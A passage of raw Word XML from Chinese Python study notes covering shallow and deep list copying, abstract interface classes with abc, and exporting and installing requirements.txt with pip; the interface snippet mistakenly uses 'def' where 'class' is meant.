    <w:p w14:paraId="0BD8F7D7" w14:textId="77777777" w:rsidR="003A40AD" w:rsidRDefault="003A40AD" w:rsidP="003A40AD">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    for i in range(5):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DA8A024" w14:textId="77777777" w:rsidR="003A40AD" w:rsidRDefault="003A40AD" w:rsidP="003A40AD">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        L.append(pattern)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36FDC7D9" w14:textId="69143EEC" w:rsidR="003A40AD" w:rsidRDefault="003A40AD" w:rsidP="003A40AD">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    return {}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39549690" w14:textId="77777777" w:rsidR="003A40AD" w:rsidRDefault="003A40AD" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="447EFA0F" w14:textId="371D30E5" w:rsidR="003A40AD" w:rsidRPr="003A40AD" w:rsidRDefault="003A40AD" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003A40AD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>手动浅拷贝</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CD83DF4" w14:textId="77777777" w:rsidR="003A40AD" w:rsidRDefault="003A40AD" w:rsidP="003A40AD">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>def apply_pattern_to_list(L, pattern='+-', from_start=True):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ECDA551" w14:textId="77777777" w:rsidR="003A40AD" w:rsidRDefault="003A40AD" w:rsidP="003A40AD">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进行浅拷贝</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="024BC8A8" w14:textId="77777777" w:rsidR="003A40AD" w:rsidRDefault="003A40AD" w:rsidP="003A40AD">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="003A40AD">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>L_copy = L[:]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="305D794C" w14:textId="77777777" w:rsidR="003A40AD" w:rsidRDefault="003A40AD" w:rsidP="003A40AD">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    L_copy.clear()  # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>修改浅拷贝的列表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68BF1EFD" w14:textId="0D032F28" w:rsidR="003A40AD" w:rsidRDefault="003A40AD" w:rsidP="003A40AD">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    return {}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BADF378" w14:textId="4B586102" w:rsidR="00774FB9" w:rsidRDefault="004051F5" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>深拷贝</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B41BEFA" w14:textId="244885CB" w:rsidR="00EB3765" w:rsidRDefault="00EB3765" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D4171B9" w14:textId="1DD4379F" w:rsidR="00EB3765" w:rsidRDefault="00EE45D9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>列表</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>b</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="716695B7" w14:textId="5CAD2719" w:rsidR="00EE45D9" w:rsidRDefault="00EE45D9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:t>=b</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79C1D53A" w14:textId="16645F95" w:rsidR="00EE45D9" w:rsidRDefault="00EE45D9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果改变</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的值，则可能也会改变</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>b</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的值，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>b</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>指向同一个列表的指针</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ED084F2" w14:textId="5BBB7083" w:rsidR="00E47208" w:rsidRDefault="00E47208" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40D82E34" w14:textId="2E140E5F" w:rsidR="00B10C8D" w:rsidRDefault="00B10C8D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>python</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>默认是浅拷贝</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52781772" w14:textId="64284E72" w:rsidR="00B10C8D" w:rsidRDefault="00B10C8D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79566A0A" w14:textId="0896872A" w:rsidR="00B10C8D" w:rsidRDefault="00B10C8D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00B10C8D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>深拷贝代码：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ED004B0" w14:textId="77777777" w:rsidR="00B10C8D" w:rsidRDefault="00B10C8D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>&gt;&gt;&gt; import copy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="581B38C3" w14:textId="4D50B904" w:rsidR="00B10C8D" w:rsidRDefault="00B10C8D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>&gt;&gt;&gt; z=copy.deepcopy(x)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44BE734C" w14:textId="31A913C9" w:rsidR="00B10C8D" w:rsidRDefault="00B10C8D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0862D054" w14:textId="77777777" w:rsidR="00BB4D61" w:rsidRDefault="00BB4D61" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7004186C" w14:textId="77777777" w:rsidR="00BB4D61" w:rsidRDefault="00BB4D61" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C71D895" w14:textId="0305BAEB" w:rsidR="00C33413" w:rsidRDefault="00C33413" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="428" w:name="_Toc159779876"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>接口类</w:t>
      </w:r>
      <w:bookmarkEnd w:id="428"/>
    </w:p>
    <w:p w14:paraId="2889DD7E" w14:textId="59156011" w:rsidR="00BB4D61" w:rsidRDefault="00E26DA8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考链接：</w:t>
      </w:r>
      <w:r w:rsidRPr="00E26DA8">
        <w:t>https://blog.csdn.net/qq_35844043/article/details/104862886</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75FD5B34" w14:textId="1F41B5A0" w:rsidR="00C33413" w:rsidRDefault="006544D9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>python</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>本身没有显式的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Interface</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>类型，</w:t>
      </w:r>
      <w:r w:rsidR="00325105">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>因为对象内部要执行什么方法直接运行就可以了，效果相同。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60A029A9" w14:textId="77777777" w:rsidR="006544D9" w:rsidRDefault="006544D9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5202EFE1" w14:textId="3612DCDF" w:rsidR="003901CB" w:rsidRPr="00A17B8E" w:rsidRDefault="003901CB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>python</w:t>
      </w:r>
      <w:r w:rsidR="00B237A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对</w:t>
      </w:r>
      <w:r w:rsidR="00706D9E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>接口的单独定义，也只是规范一个子类，子类需要贝其他类继承重写而已。</w:t>
      </w:r>
      <w:r w:rsidR="004219AB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以说</w:t>
      </w:r>
      <w:r w:rsidR="004219AB" w:rsidRPr="00A17B8E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>python</w:t>
      </w:r>
      <w:r w:rsidR="004219AB" w:rsidRPr="00A17B8E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>不需要</w:t>
      </w:r>
      <w:r w:rsidR="00A17B8E" w:rsidRPr="00A17B8E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Interface</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46F4F52D" w14:textId="77777777" w:rsidR="003901CB" w:rsidRDefault="003901CB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1AE2FBAC" w14:textId="52EA3DE1" w:rsidR="0067209A" w:rsidRPr="003975B9" w:rsidRDefault="0067209A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003975B9">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>from abc import abstractmethod, ABCMeta</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10DDC07E" w14:textId="77777777" w:rsidR="0067209A" w:rsidRPr="0067209A" w:rsidRDefault="0067209A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0067209A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">def </w:t>
      </w:r>
      <w:r w:rsidRPr="0067209A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>接口类名</w:t>
      </w:r>
      <w:r w:rsidRPr="0067209A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="003975B9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>metaclass=ABCMeta</w:t>
      </w:r>
      <w:r w:rsidRPr="0067209A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5983B5B0" w14:textId="7F54BCAC" w:rsidR="0067209A" w:rsidRPr="0067209A" w:rsidRDefault="0067209A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0067209A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:tab/>
        <w:t>"""</w:t>
      </w:r>
      <w:r w:rsidRPr="0067209A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>定义您的接口类</w:t>
      </w:r>
      <w:r w:rsidRPr="0067209A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CDE1813" w14:textId="77777777" w:rsidR="0067209A" w:rsidRPr="0067209A" w:rsidRDefault="0067209A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0067209A">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="003975B9">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>@abstractmethod</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F4E6366" w14:textId="77777777" w:rsidR="0067209A" w:rsidRPr="0067209A" w:rsidRDefault="0067209A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0067209A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">    def </w:t>
      </w:r>
      <w:r w:rsidRPr="0067209A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>方法</w:t>
      </w:r>
      <w:r w:rsidRPr="0067209A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>1(self):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D48195E" w14:textId="77777777" w:rsidR="0067209A" w:rsidRPr="0067209A" w:rsidRDefault="0067209A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0067209A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">        """</w:t>
      </w:r>
      <w:r w:rsidRPr="0067209A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>定义接口名，但不需要实现其功能，由继承此类的子类实现</w:t>
      </w:r>
      <w:r w:rsidRPr="0067209A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="157D0D71" w14:textId="70D70DD0" w:rsidR="0067209A" w:rsidRDefault="0067209A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0067209A">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">        pass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18F305FD" w14:textId="4F71DDE3" w:rsidR="0067209A" w:rsidRPr="0067209A" w:rsidRDefault="0064527D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="797973A6" w14:textId="77777777" w:rsidR="0067209A" w:rsidRPr="0067209A" w:rsidRDefault="0067209A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0067209A">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="003975B9">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>@abstractmethod</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4356B212" w14:textId="77777777" w:rsidR="0067209A" w:rsidRPr="0067209A" w:rsidRDefault="0067209A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0067209A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">    def </w:t>
      </w:r>
      <w:r w:rsidRPr="0067209A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>方法</w:t>
      </w:r>
      <w:r w:rsidRPr="0067209A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>2(self):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FFA45A9" w14:textId="77777777" w:rsidR="0067209A" w:rsidRPr="0067209A" w:rsidRDefault="0067209A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0067209A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">        """</w:t>
      </w:r>
      <w:r w:rsidRPr="0067209A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>定义接口名，但不需要实现其功能，由继承此类的子类实现</w:t>
      </w:r>
      <w:r w:rsidRPr="0067209A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1329D0DA" w14:textId="6F4F5E86" w:rsidR="00E26DA8" w:rsidRDefault="0067209A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="0067209A">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">        pass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51A0C6A8" w14:textId="77777777" w:rsidR="00E26DA8" w:rsidRDefault="00E26DA8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1EE770B9" w14:textId="77777777" w:rsidR="00E26DA8" w:rsidRDefault="00E26DA8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C0B62D0" w14:textId="77777777" w:rsidR="00E26DA8" w:rsidRDefault="00E26DA8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D39030F" w14:textId="77777777" w:rsidR="00E26DA8" w:rsidRDefault="00E26DA8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E42523B" w14:textId="77777777" w:rsidR="00E26DA8" w:rsidRDefault="00E26DA8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="660542AF" w14:textId="77777777" w:rsidR="00E26DA8" w:rsidRDefault="00E26DA8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0353E699" w14:textId="77777777" w:rsidR="00E26DA8" w:rsidRDefault="00E26DA8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69CA9627" w14:textId="77777777" w:rsidR="00E26DA8" w:rsidRDefault="00E26DA8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D76D57C" w14:textId="77777777" w:rsidR="00C33413" w:rsidRDefault="00C33413" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C4ACCB1" w14:textId="77777777" w:rsidR="00C33413" w:rsidRDefault="00C33413" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E68CC9A" w14:textId="51427B1C" w:rsidR="00AA0B6C" w:rsidRDefault="00B8569E" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="429" w:name="_Toc159779877"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>导出</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>requirements.</w:t>
      </w:r>
      <w:r>
        <w:t>txt</w:t>
      </w:r>
      <w:bookmarkEnd w:id="429"/>
    </w:p>
    <w:p w14:paraId="7E79BAB5" w14:textId="2BD52D1F" w:rsidR="00B8569E" w:rsidRDefault="00B8569E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C30C7C5" w14:textId="244D8803" w:rsidR="00B8569E" w:rsidRDefault="008F28EF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>导出</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>全部的库</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D678E6A" w14:textId="64DF12C0" w:rsidR="008F28EF" w:rsidRDefault="008F28EF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>pip</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> freeze </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> requirements.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D293F1F" w14:textId="5CDF2C5C" w:rsidR="00B8569E" w:rsidRDefault="00B8569E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78B5B2BD" w14:textId="24443254" w:rsidR="008F28EF" w:rsidRDefault="008F28EF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>根据</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>requirements</w:t>
      </w:r>
      <w:r>
        <w:t>.txt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>安装类库：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="674B7530" w14:textId="53BCBBCA" w:rsidR="008F28EF" w:rsidRDefault="008F28EF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r>
        <w:t>ip install -r requirements.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A7D12A5" w14:textId="7B410ABF" w:rsidR="008F28EF" w:rsidRDefault="008F28EF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0946342E" w14:textId="606B2C7A" w:rsidR="008F28EF" w:rsidRPr="007F21F5" w:rsidRDefault="00C71622" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F21F5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
